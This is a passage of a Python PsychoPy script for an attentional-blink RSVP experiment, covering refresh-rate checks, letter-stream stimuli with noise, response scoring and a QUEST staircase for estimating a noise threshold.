title='AB experiment OR staircase to find thresh noise level for T1 performance criterion',
order=['Do staircase (only)', 'Check refresh etc',
'Fullscreen (timing errors if not)'],
tip={
'Check refresh etc': 'To confirm refresh rate and that can keep up, at least when drawing a grating'},
# fixed=['Check refresh etc'])#this attribute can't be changed by the user
)
if not OK.OK:
print('User cancelled from dialog box')
core.quit()
doStaircase = infoFirst['Do staircase (only)']
checkRefreshEtc = infoFirst['Check refresh etc']
fullscr = infoFirst['Fullscreen (timing errors if not)']
refreshRate = infoFirst['Screen refresh rate']
if checkRefreshEtc:
quitFinder = True
if quitFinder:
import os
applescript = "\'tell application \"Finder\" to quit\'"
shellCmd = 'osascript -e '+applescript
os.system(shellCmd)
# letter size 2.5 deg
numLettersToPresent = 26
SOAms = 133 # Battelli, Agosta, Goodbourn, Holcombe mostly using 133
# Minimum SOAms should be 84 because any shorter, I can't always notice the second ring when lag1. 71 in Martini E2 and E1b (actually he used 66.6 but that's because he had a crazy refresh rate of 90 Hz)
# 23.6 in Martini E2 and E1b (actually he used 22.2 but that's because he had a crazy refresh rate of 90 Hz)
letterDurMs = 80
ISIms = SOAms - letterDurMs
letterDurFrames = int(np.floor(letterDurMs / (1000./refreshRate)))
cueDurFrames = letterDurFrames
ISIframes = int(np.floor(ISIms / (1000./refreshRate)))
# have set ISIframes and letterDurFrames to integer that corresponds as close as possible to originally intended ms
rateInfo = 'total SOA=' + str(round((ISIframes + letterDurFrames)*1000./refreshRate, 2)) + \
' or ' + str(ISIframes + letterDurFrames) + ' frames, comprising\n'
rateInfo += 'ISIframes ='+str(ISIframes)+' or '+str(ISIframes*(1000./refreshRate))+' ms and letterDurFrames =' + \
str(letterDurFrames)+' or '+str(round(letterDurFrames*(1000./refreshRate), 2))+'ms'
logging.info(rateInfo)
print(rateInfo)
trialDurFrames = int(numLettersToPresent*(ISIframes+letterDurFrames)) # trial duration in frames
monitorname = 'testmonitor'
waitBlank = False
# relying on monitorwidth cm (39 for Mitsubishi to do deg calculations) and gamma info in calibratn
mon = monitors.Monitor(monitorname, width=monitorwidth, distance=viewdist)
mon.setSizePix((widthPix, heightPix))
units = 'deg' # 'cm'
def openMyStimWindow(): # make it a function because have to do it several times, want to be sure is identical each time
myWin = visual.Window(monitor=mon, size=(widthPix, heightPix), allowGUI=allowGUI, units=units, color=bgColor,
colorSpace='rgb', fullscr=fullscr, screen=scrn, waitBlanking=waitBlank) # Holcombe lab monitor
return myWin
myWin = openMyStimWindow()
refreshMsg2 = ''
if not checkRefreshEtc:
refreshMsg1 = 'REFRESH RATE WAS NOT CHECKED'
refreshRateWrong = False
else: # checkRefreshEtc
runInfo = psychopy.info.RunTimeInfo(
# if you specify author and version here, it overrides the automatic detection of __author__ and __version__ in your script
# author='<your name goes here, plus whatever you like, e.g., your lab or contact info>',
# version="<your experiment version info>",
win=myWin, # a psychopy.visual.Window() instance; None = default temp window used; False = no win, no win.flips()
refreshTest='grating', # None, True, or 'grating' (eye-candy to avoid a blank screen)
verbose=True, # True means report on everything
# if verbose and userProcsDetailed, return (command, process-ID) of the user's processes
userProcsDetailed=True
)
# print(runInfo)
logging.info(runInfo)
print('Finished runInfo- which assesses the refresh and processes of this computer')
#check screen refresh is what assuming it is ##############################################
Hzs = list()
myWin.flip()
myWin.flip()
myWin.flip()
myWin.flip()
myWin.setRecordFrameIntervals(True) # otherwise myWin.fps won't work
print('About to measure frame flips')
for i in range(50):
myWin.flip()
Hzs.append(myWin.fps()) # varies wildly on successive runs!
myWin.setRecordFrameIntervals(False)
# end testing of screen refresh########################################################
Hzs = np.array(Hzs)
Hz = np.median(Hzs)
msPerFrame = 1000./Hz
refreshMsg1 = 'Frames per second ~=' + str(np.round(Hz, 1))
refreshRateTolerancePct = 3
pctOff = abs((np.median(Hzs)-refreshRate) / refreshRate)
refreshRateWrong = pctOff > (refreshRateTolerancePct/100.)
if refreshRateWrong:
refreshMsg1 += ' BUT'
refreshMsg1 += ' program assumes ' + str(refreshRate)
refreshMsg2 = 'which is off by more than' + str(round(refreshRateTolerancePct, 0)) + '%!!'
else:
refreshMsg1 += ', which is close enough to desired val of ' + str(round(refreshRate, 1))
myWinRes = myWin.size
myWin.allowGUI = True
myWin.close() # have to close window to show dialog box
defaultNoiseLevel = 0.0 # to use if no staircase, can be set by user
trialsPerCondition = 5 # default value
dlgLabelsOrdered = list()
if doStaircase:
myDlg = gui.Dlg(title="Staircase to find appropriate noisePercent", pos=(200, 400))
else:
myDlg = gui.Dlg(title="RSVP experiment", pos=(200, 400))
if not autopilot:
myDlg.addField('Subject name (default="Adi"):', 'Adi', tip='or subject code')
dlgLabelsOrdered.append('subject')
if doStaircase:
easyTrialsCondText = 'Num preassigned noise trials to preface staircase with (default=' + str(
prefaceStaircaseTrialsN) + '):'
myDlg.addField(easyTrialsCondText, tip=str(prefaceStaircaseTrialsN))
dlgLabelsOrdered.append('easyTrials')
myDlg.addField('Staircase trials (default=' + str(staircaseTrials) + '):',
tip="Staircase will run until this number is reached or it thinks it has precise estimate of threshold")
dlgLabelsOrdered.append('staircaseTrials')
pctCompletedBreak = 101
else:
myDlg.addField('\tPercent noise dots=', defaultNoiseLevel, tip=str(defaultNoiseLevel))
dlgLabelsOrdered.append('defaultNoiseLevel')
myDlg.addField('Trials per condition (default=' + str(trialsPerCondition) + '):',
trialsPerCondition, tip=str(trialsPerCondition))
dlgLabelsOrdered.append('trialsPerCondition')
pctCompletedBreak = 25
myDlg.addText(refreshMsg1, color='Black')
if refreshRateWrong:
myDlg.addText(refreshMsg2, color='Red')
if refreshRateWrong:
logging.error(refreshMsg1+refreshMsg2)
else:
logging.info(refreshMsg1+refreshMsg2)
if checkRefreshEtc and (not demo) and (myWinRes != [widthPix, heightPix]).any():
msgWrongResolution = 'Screen apparently NOT the desired resolution of ' + \
str(widthPix)+'x'+str(heightPix) + ' pixels!!'
myDlg.addText(msgWrongResolution, color='Red')
logging.error(msgWrongResolution)
print(msgWrongResolution)
# color='DimGrey') color names stopped working along the way, for unknown reason
myDlg.addText('Note: to abort press ESC at a trials response screen')
myDlg.show()
if myDlg.OK: # unpack information from dialogue box
thisInfo = myDlg.data # this will be a list of data returned from each field added in order
if not autopilot:
name = thisInfo[dlgLabelsOrdered.index('subject')]
if len(name) > 0: # if entered something
subject = name # change subject default name to what user entered
if doStaircase:
if len(thisInfo[dlgLabelsOrdered.index('staircaseTrials')]) > 0:
staircaseTrials = int(thisInfo[dlgLabelsOrdered.index(
'staircaseTrials')]) # convert string to integer
print('staircaseTrials entered by user=', staircaseTrials)
logging.info('staircaseTrials entered by user=', staircaseTrials)
if len(thisInfo[dlgLabelsOrdered.index('easyTrials')]) > 0:
# convert string to integer
prefaceStaircaseTrialsN = int(thisInfo[dlgLabelsOrdered.index('easyTrials')])
print('prefaceStaircaseTrialsN entered by user=',
thisInfo[dlgLabelsOrdered.index('easyTrials')])
logging.info('prefaceStaircaseTrialsN entered by user=', prefaceStaircaseTrialsN)
else: # not doing staircase
trialsPerCondition = int(thisInfo[dlgLabelsOrdered.index(
'trialsPerCondition')]) # convert string to integer
print('trialsPerCondition=', trialsPerCondition)
logging.info('trialsPerCondition =', trialsPerCondition)
defaultNoiseLevel = int(thisInfo[dlgLabelsOrdered.index('defaultNoiseLevel')])
else:
print('User cancelled from dialog box.')
logging.flush()
core.quit()
if not demo:
allowGUI = False
myWin = openMyStimWindow()
# set up output data file, log file, copy of program code, and logging
infix = ''
if doStaircase:
infix = 'staircase_'
fileName = os.path.join(dataDir, subject + '_' + infix + timeAndDateStr)
if not demo and not exportImages:
dataFile = open(fileName+'.txt', 'w')
saveCodeCmd = 'cp \'' + \
sys.argv[0] + '\' ' + os.path.join(codeDir,
subject + '_' + infix + timeAndDateStr) + '.py'
os.system(saveCodeCmd) # save a copy of the code as it was when that subject was run
logFname = os.path.join(logsDir, subject + '_' + infix + timeAndDateStr)+'.log'
ppLogF = logging.LogFile(logFname,
filemode='w', # if you set this to 'a' it will append instead of overwriting
level=logging.INFO) # errors, data and warnings will be sent to this logfile
if demo or exportImages:
dataFile = sys.stdout
logF = sys.stdout
logging.console.setLevel(logging.ERROR) # only show this level messages and higher
# DEBUG means set console to receive nearly all messges, INFO next level, EXP, DATA, WARNING and ERROR
logging.console.setLevel(logging.ERROR)
if fullscr and not demo and not exportImages:
runInfo = psychopy.info.RunTimeInfo(
# if you specify author and version here, it overrides the automatic detection of __author__ and __version__ in your script
# author='<your name goes here, plus whatever you like, e.g., your lab or contact info>',
# version="<your experiment version info>",
win=myWin, # a psychopy.visual.Window() instance; None = default temp window used; False = no win, no win.flips()
refreshTest='grating', # None, True, or 'grating' (eye-candy to avoid a blank screen)
verbose=False, # True means report on everything
# if verbose and userProcsDetailed, return (command, process-ID) of the user's processes
userProcsDetailed=True,
# randomSeed='set:42', ## a way to record, and optionally set, a random seed of type str for making reproducible random sequences
# None -> default
# 'time' will use experimentRuntime.epoch as the value for the seed, different value each time the script is run
# 'set:time' --> seed value is set to experimentRuntime.epoch, and initialized: random.seed(info['randomSeed'])
# 'set:42' --> set & initialize to str('42'), and will give the same sequence of random.random() for all runs of the script
)
logging.info(runInfo)
logging.flush()
# create click sound for keyboard
try:
click = sound.Sound('406__tictacshutup__click-1-d.wav')
except: # in case file missing, create inferiro click manually
logging.warn(
'Could not load the desired click sound file, instead using manually created inferior click')
click = sound.Sound('D', octave=4, sampleRate=22050, secs=0.015, bits=8)
if showRefreshMisses:
fixSizePix = 32 # 2.6 #make fixation bigger so flicker more conspicuous
else:
fixSizePix = 32
fixColor = [1, 1, 1]
if exportImages:
fixColor = [0, 0, 0]
# Can counterphase flicker noise texture to create salient flicker if you break fixation
fixatnNoiseTexture = np.round(np.random.rand(fixSizePix/4, fixSizePix/4), 0) * 2.0-1
fixation = visual.PatchStim(myWin, tex=fixatnNoiseTexture, size=(
fixSizePix, fixSizePix), units='pix', mask='circle', interpolate=False, autoLog=False)
fixationBlank = visual.PatchStim(myWin, tex=-1*fixatnNoiseTexture, size=(fixSizePix, fixSizePix),
units='pix', mask='circle', interpolate=False, autoLog=False) # reverse contrast
fixationPoint = visual.PatchStim(myWin, tex='none', colorSpace='rgb', color=(
1, 1, 1), size=10, units='pix', autoLog=autoLogging)
respPromptStim = visual.TextStim(myWin, pos=(0, -.9), colorSpace='rgb', color=(1, 1, 1),
alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
acceptTextStim = visual.TextStim(myWin, pos=(0, -.8), colorSpace='rgb', color=(1, 1, 1),
alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
acceptTextStim.setText('Hit ENTER to accept. Backspace to edit')
respStim = visual.TextStim(myWin, pos=(0, 0), colorSpace='rgb', color=(
1, 1, 0), alignHoriz='center', alignVert='center', height=.16, units='norm', autoLog=autoLogging)
clickSound, badKeySound = stringResponse.setupSoundsForResponse()
requireAcceptance = False
nextText = visual.TextStim(myWin, pos=(0, .1), colorSpace='rgb', color=(
1, 1, 1), alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
NextRemindCountText = visual.TextStim(myWin, pos=(0, .2), colorSpace='rgb', color=(
1, 1, 1), alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
screenshot = False
screenshotDone = False
stimList = []
# SETTING THE CONDITIONS
possibleCue1positions = np.array([6, 8, 10, 14]) # [4,10,16,22] used in Martini E2, group 2
possibleCue2lags = np.array([1, 2, 5, 8, 10])
cueCoords = [[2, 0], [-2, 0], [6, 0], [-6, 0]]
shuffle(cueCoords)
shuffle(possibleCue1positions)
shuffle(possibleCue2lags)
for coords in cueCoords:
for cue1pos in possibleCue1positions:
for cue2lag in possibleCue2lags:
stimList.append({'cue1pos': cue1pos, 'cue2lag': cue2lag, 'cueCoords': coords})
# Martini E2 and also AB experiments used 400 trials total, with breaks between every 100 trials
trials = data.TrialHandler(stimList, trialsPerCondition,
method='sequential') # constant stimuli method
# independent randomization, just to create random trials for staircase phase
trialsForPossibleStaircase = data.TrialHandler(stimList, trialsPerCondition)
# summary results to print out at end
numRightWrongEachCuepos = np.zeros([len(possibleCue1positions), 1])
# summary results to print out at end
numRightWrongEachCue2lag = np.zeros([len(possibleCue2lags), 1])
logging.info('numtrials=' + str(trials.nTotal) + ' and each trialDurFrames='+str(trialDurFrames)+' or '+str(trialDurFrames*(1000./refreshRate)) +
' ms' + ' task=' + task)
def numberToLetter(number): # 0 = A, 25 = Z
# if it's not really a letter, return @
# if type(number) != type(5) and type(number) != type(np.array([3])[0]): #not an integer or numpy.int32
# return ('@')
if number < 0 or number > 25:
return ('@')
else: # it's probably a letter
try:
return chr(ord('A')+number)
except:
return('@')
def letterToNumber(letter): # A = 0, Z = 25
# if it's not really a letter, return -999
# HOW CAN I GENERICALLY TEST FOR LENGTH. EVEN IN CASE OF A NUMBER THAT' SNOT PART OF AN ARRAY?
try:
# if len(letter) > 1:
# return (-999)
if letter < 'A' or letter > 'Z':
return (-999)
else: # it's a letter
return ord(letter)-ord('A')
except:
return (-999)
# print header for data file
print('experimentPhase\ttrialnum\tsubject\ttask\t', file=dataFile, end='')
print('noisePercent\t', end='', file=dataFile)
if task == 'T1':
numRespsWanted = 1
elif task == 'T1T2':
numRespsWanted = 2
for i in range(numRespsWanted):
# have to use write to avoid ' ' between successive text, at least until Python 3
dataFile.write('answerPos'+str(i)+'\t')
dataFile.write('answer'+str(i)+'\t')
dataFile.write('response'+str(i)+'\t')
dataFile.write('correct'+str(i)+'\t')
dataFile.write('responsePosRelative'+str(i)+'\t')
print('spatialPos\t', file=dataFile)
print('timingBlips', file=dataFile)
# end of header
def oneFrameOfStim(n, cue, letterSequence, cueDurFrames, letterDurFrames, ISIframes, cuesPos, lettersDrawObjects,
noise, proportnNoise, allFieldCoords, numNoiseDots, spatialPos, correctAnswers, resetCorrectAnswers):
# defining a function to draw each frame of stim. So can call second time for tracking task response phase
SOAframes = letterDurFrames+ISIframes
cueFrames = cuesPos*SOAframes # cuesPos is global variable
letterN = int(np.floor(n/SOAframes))
frameOfThisLetter = n % SOAframes # every SOAframes, new letter
# if true, it's not time for the blank ISI. it's still time to draw the letter
showLetter = frameOfThisLetter < letterDurFrames
# print 'n=',n,' SOAframes=',SOAframes, ' letterDurFrames=', letterDurFrames, ' (n % SOAframes) =', (n % SOAframes) #DEBUGOFF
thisLetterIdx = letterSequence[letterN] # which letter, from A to Z (1 to 26), should be shown?
# so that any timing problems occur just as often for every frame, always draw the letter and the cue, but simply draw it in the bgColor when it's not meant to be on
cue.setLineColor(bgColor)
for i, cueFrame in enumerate(cueFrames): # cheTck whether it's time for any cue
if n >= cueFrame and n < cueFrame+cueDurFrames:
# cue.setLineColor(cueColor)
cue.setPos(spatialPos)
lettersDrawObjects[thisLetterIdx].setText(correctAnswers[i])
if showLetter:
lettersDrawObjects[thisLetterIdx].setColor(letterColor)
else:
lettersDrawObjects[thisLetterIdx].setColor(bgColor)
lettersDrawObjects[thisLetterIdx].setPos(spatialPos)
lettersDrawObjects[thisLetterIdx].draw()
lettersDrawObjects[thisLetterIdx].setText(numberToLetter(thisLetterIdx))
cue.draw()
# Not recommended because takes longer than a frame, even to shuffle apparently. Or may be setXYs step
refreshNoise = False
if proportnNoise > 0 and refreshNoise:
if frameOfThisLetter == 0:
np.random.shuffle(allFieldCoords)
dotCoords = allFieldCoords[0:numNoiseDots]
noise.setXYs(dotCoords)
if proportnNoise > 0:
noise.draw()
return True
# #######End of function definition that displays the stimuli!!!! #####################################
#############################################################################################################################
cue = visual.Circle(myWin,
radius=cueRadius, # Martini used circles with diameter of 12 deg
lineColorSpace='rgb',
lineColor=bgColor,
lineWidth=2.0, # in pixels
units='deg',
fillColorSpace='rgb',
fillColor=None, # beware, with convex shapes fill colors don't work
# the anchor (rotation and vertices are position with respect to this)
pos=[0, 0],
interpolate=True,
autoLog=False) # this stim changes too much for autologging to be useful
fixation_center = visual.Circle(myWin,
radius=0.2, # Martini used circles with diameter of 12 deg
lineColorSpace='rgb',
lineColor=[1, -1, -1],
lineWidth=2.0, # in pixels
units='deg',
fillColorSpace='rgb',
# beware, with convex shapes fill colors don't work
fillColor=[1, -1, -1],
# the anchor (rotation and vertices are position with respect to this)
pos=[0, 0],
interpolate=True,
autoLog=False) # this stim changes too much for autologging to be useful
# predraw all 26 letters
ltrHeight = 2.5 # Martini letters were 2.5deg high
lettersDrawObjects = list()
for i in range(0, 26):
letterDraw = visual.TextStim(myWin, pos=(0, 0), colorSpace='rgb', color=letterColor,
alignHoriz='center', alignVert='center', units='deg', autoLog=autoLogging)
letterDraw.setHeight(ltrHeight)
letter = numberToLetter(i)
letterDraw.setText(letter, log=False)
letterDraw.setColor(bgColor)
lettersDrawObjects.append(letterDraw)
# All noise dot coordinates ultimately in pixels, so can specify each dot is one pixel
noiseFieldWidthDeg = ltrHeight * 1.0
noiseFieldWidthPix = int(round(noiseFieldWidthDeg*pixelperdegree))
def timingCheckAndLog(ts, trialN):
# check for timing problems and log them
# ts is a list of the times of the clock after each frame
interframeIntervs = np.diff(ts)*1000
# print ' interframe intervs were ',around(interframeIntervs,1) #DEBUGOFF
frameTimeTolerance = .3 # proportion longer than refreshRate that will not count as a miss
longFrameLimit = np.round(1000/refreshRate*(1.0+frameTimeTolerance), 2)
idxsInterframeLong = np.where(interframeIntervs > longFrameLimit)[
0] # frames that exceeded 150% of expected duration
numCasesInterframeLong = len(idxsInterframeLong)
if numCasesInterframeLong > 0 and (not demo):
longFramesStr = 'ERROR,'+str(numCasesInterframeLong) + \
' frames were longer than '+str(longFrameLimit)+' ms'
if demo:
longFramesStr += 'not printing them all because in demo mode'
else:
longFramesStr += ' apparently screen refreshes skipped, interframe durs were:' +\
str(np.around(interframeIntervs[idxsInterframeLong], 1)
) + ' and was these frames: ' + str(idxsInterframeLong)
if longFramesStr != None:
logging.error('trialnum='+str(trialN)+' '+longFramesStr)
if not demo:
flankingAlso = list()
for idx in idxsInterframeLong: # also print timing of one before and one after long frame
if idx-1 >= 0:
flankingAlso.append(idx-1)
else:
flankingAlso.append(np.NaN)
flankingAlso.append(idx)
if idx+1 < len(interframeIntervs):
flankingAlso.append(idx+1)
else:
flankingAlso.append(np.NaN)
flankingAlso = np.array(flankingAlso)
flankingAlso = flankingAlso[~
np.isnan(flankingAlso)] # remove nan values
# cast as integers, so can use as subscripts
flankingAlso = flankingAlso.astype(np.integer)
# because this is not an essential error message, as previous one already indicates error
logging.info('flankers also='+str(np.around(interframeIntervs[flankingAlso], 1)))
# As INFO, at least it won't fill up the console when console set to WARNING or higher
return numCasesInterframeLong
# end timing check
trialClock = core.Clock()
numTrialsCorrect = 0
numTrialsApproxCorrect = 0
numTrialsEachCorrect = np.zeros(numRespsWanted)
numTrialsEachApproxCorrect = np.zeros(numRespsWanted)
nTrialsCorrectT2eachLag = np.zeros(len(possibleCue2lags))
nTrialsEachLag = np.zeros(len(possibleCue2lags))
nTrialsApproxCorrectT2eachLag = np.zeros(len(possibleCue2lags))
def do_RSVP_stim(cue1pos, spatialPos, cue2lag, proportnNoise, trialN):
# relies on global variables:
# logging, bgColor
#
cuesPos = [] # will contain the positions of all the cues (targets)
cuesPos.append(cue1pos)
if task == 'T1T2':
cuesPos.append(cue1pos+cue2lag)
cuesPos = np.array(cuesPos)
letterSequence = np.arange(0, 26)
np.random.shuffle(letterSequence)
correctAnswers = np.random.choice(np.arange(10), size=len(
cuesPos), replace=False) # np.array(letterSequence[cuesPos])
resetCorrectAnswers = np.array(letterSequence[cuesPos])
noise = None
allFieldCoords = None
numNoiseDots = 0
if proportnNoise > 0: # generating noise is time-consuming, so only do it once per trial. Then shuffle noise coordinates for each letter
(noise, allFieldCoords, numNoiseDots) = createNoise(
proportnNoise, myWin, noiseFieldWidthPix, bgColor)
# I don't know why this works, but without drawing it I have consistent timing blip first time that draw ringInnerR for phantom contours
preDrawStimToGreasePipeline = list()
cue.setLineColor(bgColor)
preDrawStimToGreasePipeline.extend([cue])
for stim in preDrawStimToGreasePipeline:
stim.draw()
myWin.flip()
myWin.flip()
# end preparation of stimuli
framesSaved = 0
core.wait(.1)
trialClock.reset()
fixatnPeriodMin = 0.3
# random interval between 800ms and 1.3s (changed when Fahed ran outer ring ident)
fixatnPeriodFrames = int((np.random.rand(1)/2.+fixatnPeriodMin) * refreshRate)
ts = list() # to store time of each drawing, to check whether skipped frames
for i in range(fixatnPeriodFrames+20): # prestim fixation interval
# if i%4>=2 or demo or exportImages: #flicker fixation on and off at framerate to see when skip frame
# fixation.draw()
# else: fixationBlank.draw()
fixationPoint.draw()
myWin.flip() # end fixation interval
# myWin.setRecordFrameIntervals(True); #can't get it to stop detecting superlong frames
fixation_center.setAutoDraw(True)
myWin.flip()
t0 = trialClock.getTime()
for n in range(trialDurFrames): # this is the loop for this trial's stimulus!
worked = oneFrameOfStim(n, cue, letterSequence, cueDurFrames, letterDurFrames, ISIframes, cuesPos, lettersDrawObjects,
noise, proportnNoise, allFieldCoords, numNoiseDots, spatialPos, correctAnswers, resetCorrectAnswers) # draw letter and possibly cue and noise on top
if exportImages:
myWin.getMovieFrame(buffer='back') # for later saving
framesSaved += 1
myWin.flip()
t = trialClock.getTime()-t0
ts.append(t)
fixation_center.setAutoDraw(False)
myWin.flip()
# end of big stimulus loop
myWin.setRecordFrameIntervals(False)
if task == 'T1':
respPromptStim.setText('Which letter was circled?', log=False)
elif task == 'T1T2':
respPromptStim.setText('What are the two numbers?', log=False)
else:
respPromptStim.setText('Error: unexpected task', log=False)
postCueNumBlobsAway = -999 # doesn't apply to non-tracking and click tracking task
return letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts
def handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers, spatialPos):
#Handle response, calculate whether correct, ########################################
if autopilot or passThisTrial:
responses = responsesAutopilot
eachCorrect = np.zeros(len(correctAnswers))
eachApproxCorrect = np.zeros(len(correctAnswers))
posOfResponse = np.zeros(len(cuesPos))
responsePosRelative = np.zeros(len(cuesPos))
for i in range(len(cuesPos)): # score response to each cue
if correctAnswers[i] == int(responses[i]):
print(correctAnswers[i], responses[i])
eachCorrect[i] = 1
posThisResponse = np.where(letterToNumber(responses[i]) == letterSequence)
# print 'responses=',responses,'posThisResponse raw=',posThisResponse, ' letterSequence=',letterSequence #debugOFF
# list with potentially two entries, want first which will be array of places where the reponse was found in the letter sequence
posThisResponse = posThisResponse[0]
if len(posThisResponse) > 1:
logging.error('Expected response to have occurred in only one position in stream')
if np.alen(posThisResponse) == 0: # response not found in letter sequence
posThisResponse = -999
logging.warn('Response was not present in the stimulus stream')
else:
posThisResponse = posThisResponse[0]
posOfResponse[i] = posThisResponse
responsePosRelative[i] = posOfResponse[i] - cuesPos[i]
# Vul efficacy measure of getting it right to within plus/minus
eachApproxCorrect[i] += abs(responsePosRelative[i]) <= 3
for i in range(len(cuesPos)): # print response stuff to dataFile
# header was answerPos0, answer0, response0, correct0, responsePosRelative0
print(cuesPos[i], '\t', end='', file=dataFile)
answerCharacter = numberToLetter(letterSequence[cuesPos[i]])
print(correctAnswers[i], '\t', end='', file=dataFile) # answer0
print(responses[i], '\t', end='', file=dataFile) # response0
print(eachCorrect[i], '\t', end='', file=dataFile) # correct0
print(responsePosRelative[i], '\t', end='', file=dataFile) # responsePosRelative0
correct = eachCorrect.all()
T1approxCorrect = eachApproxCorrect[0]
print(spatialPos, '\t', end='', file=dataFile)
return correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop
# end handleAndScoreResponses
def play_high_tone_correct_low_incorrect(correct, passThisTrial=False):
highA = sound.Sound('G', octave=5, sampleRate=6000, secs=.3, bits=8)
low = sound.Sound('F', octave=3, sampleRate=6000, secs=.3, bits=8)
highA.setVolume(0.9)
low.setVolume(1.0)
if correct:
highA.play()
elif passThisTrial:
high = sound.Sound('G', octave=4, sampleRate=2000, secs=.08, bits=8)
for i in range(2):
high.play()
low.play()
else: # incorrect
low.play()
def display_message(win, txt, msg):
"""A function to display text to the experiment window.
win: psychopy.visual.Window
The window to write the message to.
fix: psychopy.visual.Circle
The fixation point to be removed from the screen.
txt: psychopy.visual.TextStim
The text object to present to the screen.
msg: String
The contents for the text object.
"""
txt.setText(msg)
txt.setAutoDraw(True)
win.flip()
event.waitKeys()
txt.setAutoDraw(False)
win.flip()
TEXT_HEIGHT = 0.5 # The height in visual degrees of instruction text
TEXT_WRAP = 30 # The character limit of each line of text before word wrap
display_text = visual.TextStim(
win=myWin,
ori=0,
name='text',
text="",
font='Arial',
pos=[
0,
0],
wrapWidth=TEXT_WRAP,
height=TEXT_HEIGHT,
color=[1, 1, 1],
colorSpace='rgb',
opacity=1,
depth=-1.0)
# Present instructions for the experiment
display_message(myWin, display_text, INS_MSG)
expStop = False
framesSaved = 0
nDoneMain = -1 # change to zero once start main part of experiment
if doStaircase:
# create the staircase handler
useQuest = True
if useQuest:
staircase = data.QuestHandler(startVal=95,
startValSd=80,
stopInterval=1, # sd of posterior has to be this small or smaller for staircase to stop, unless nTrials reached
nTrials=staircaseTrials,
# extraInfo = thisInfo,
pThreshold=threshCriterion, # 0.25,
gamma=1./26,
delta=0.02, # lapse rate, I suppose for Weibull function fit
method='quantile', # uses the median of the posterior as the final answer
stepType='log', # will home in on the 80% threshold. But stepType = 'log' doesn't usually work
minVal=1, maxVal=100
)
print('created QUEST staircase')
else:
stepSizesLinear = [.2, .2, .1, .1, .05, .05]
stepSizesLog = [log(1.4, 10), log(1.4, 10), log(1.3, 10), log(1.3, 10), log(1.2, 10)]
staircase = data.StairHandler(startVal=0.1,
stepType='log', # if log, what do I want to multiply it by
stepSizes=stepSizesLog, # step size to use after each reversal
minVal=0, maxVal=1,
nUp=1, nDown=3, # will home in on the 80% threshold
nReversals=2, # The staircase terminates when nTrials have been exceeded, or when both nReversals and nTrials have been exceeded
nTrials=1)
print('created conventional staircase')
# repeat array to accommodate desired number of easyStarterTrials
if prefaceStaircaseTrialsN > len(prefaceStaircaseNoise):
prefaceStaircaseNoise = np.tile(prefaceStaircaseNoise, ceil(
prefaceStaircaseTrialsN/len(prefaceStaircaseNoise)))
prefaceStaircaseNoise = prefaceStaircaseNoise[0:prefaceStaircaseTrialsN]
phasesMsg = ('Doing '+str(prefaceStaircaseTrialsN)+'trials with noisePercent= ' +
str(prefaceStaircaseNoise)+' then doing a max '+str(staircaseTrials)+'-trial staircase')
print(phasesMsg)
logging.info(phasesMsg)
# staircaseStarterNoise PHASE OF EXPERIMENT
corrEachTrial = list() # only needed for easyStaircaseStarterNoise
staircaseTrialN = -1
mainStaircaseGoing = False
while (not staircase.finished) and expStop == False: # staircase.thisTrialN < staircase.nTrials
if staircaseTrialN+1 < len(prefaceStaircaseNoise): # still doing easyStaircaseStarterNoise
staircaseTrialN += 1
noisePercent = prefaceStaircaseNoise[staircaseTrialN]
else:
# add these non-staircase trials so QUEST knows about them
if staircaseTrialN+1 == len(prefaceStaircaseNoise):
mainStaircaseGoing = True
print('Importing ', corrEachTrial, ' and intensities ', prefaceStaircaseNoise)
staircase.importData(100-prefaceStaircaseNoise, np.array(corrEachTrial))
printStaircase(staircase, descendingPsycho, briefTrialUpdate=False,
printInternalVal=True, alsoLog=False)
try: # advance the staircase
printStaircase(staircase, descendingPsycho, briefTrialUpdate=True,
printInternalVal=True, alsoLog=False)
# will step through the staircase, based on whether told it (addResponse) got it right or wrong
noisePercent = 100. - staircase.next()
staircaseTrialN += 1
except StopIteration: # Need this here, even though test for finished above. I can't understand why finished test doesn't accomplish this.
print(
'stopping because staircase.next() returned a StopIteration, which it does when it is finished')
break # break out of the trials loop
# print('staircaseTrialN=',staircaseTrialN)
letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts = do_RSVP_stim(
cue1pos, cue2lag, noisePercent/100., staircaseTrialN)
numCasesInterframeLong = timingCheckAndLog(ts, staircaseTrialN)
expStop, passThisTrial, responses, responsesAutopilot = \
stringResponse.collectStringResponse(numRespsWanted, respPromptStim, respStim, acceptTextStim, myWin, clickSound, badKeySound,
requireAcceptance, autopilot, responseDebug=True)
if not expStop:
if mainStaircaseGoing:
print('staircase\t', end='', file=dataFile)
else:
print('staircase_preface\t', end='', file=dataFile)
# header start 'trialnum\tsubject\ttask\t'
# first thing printed on each line of dataFile
print(staircaseTrialN, '\t', end='', file=dataFile)
print(subject, '\t', task, '\t', round(noisePercent, 2), '\t', end='', file=dataFile)
correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop = (
handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers))
# print('Scored response. expStop=',expStop) #debug
# timingBlips, last thing recorded on each line of dataFile
print(numCasesInterframeLong, file=dataFile)
core.wait(.06)
if feedback:
play_high_tone_correct_low_incorrect(correct, passThisTrial=False)
print('staircaseTrialN=', staircaseTrialN, ' noisePercent=', round(
noisePercent, 3), ' T1approxCorrect=', T1approxCorrect) # debugON
corrEachTrial.append(T1approxCorrect)
if mainStaircaseGoing:
# Add a 1 or 0 to signify a correct/detected or incorrect/missed trial
staircase.addResponse(T1approxCorrect, intensity=100-noisePercent)
# print('Have added an intensity of','{:.3f}'.format(100-noisePercent), 'T1approxCorrect =', T1approxCorrect, ' to staircase') #debugON
# ENDING STAIRCASE PHASE
# exp stopped before got through staircase preface trials, so haven't imported yet
if staircaseTrialN+1 < len(prefaceStaircaseNoise) and (staircaseTrialN >= 0):
print('Importing ', corrEachTrial, ' and intensities ',
prefaceStaircaseNoise[0:staircaseTrialN+1])
staircase.importData(100-prefaceStaircaseNoise[0:staircaseTrialN], np.array(corrEachTrial))
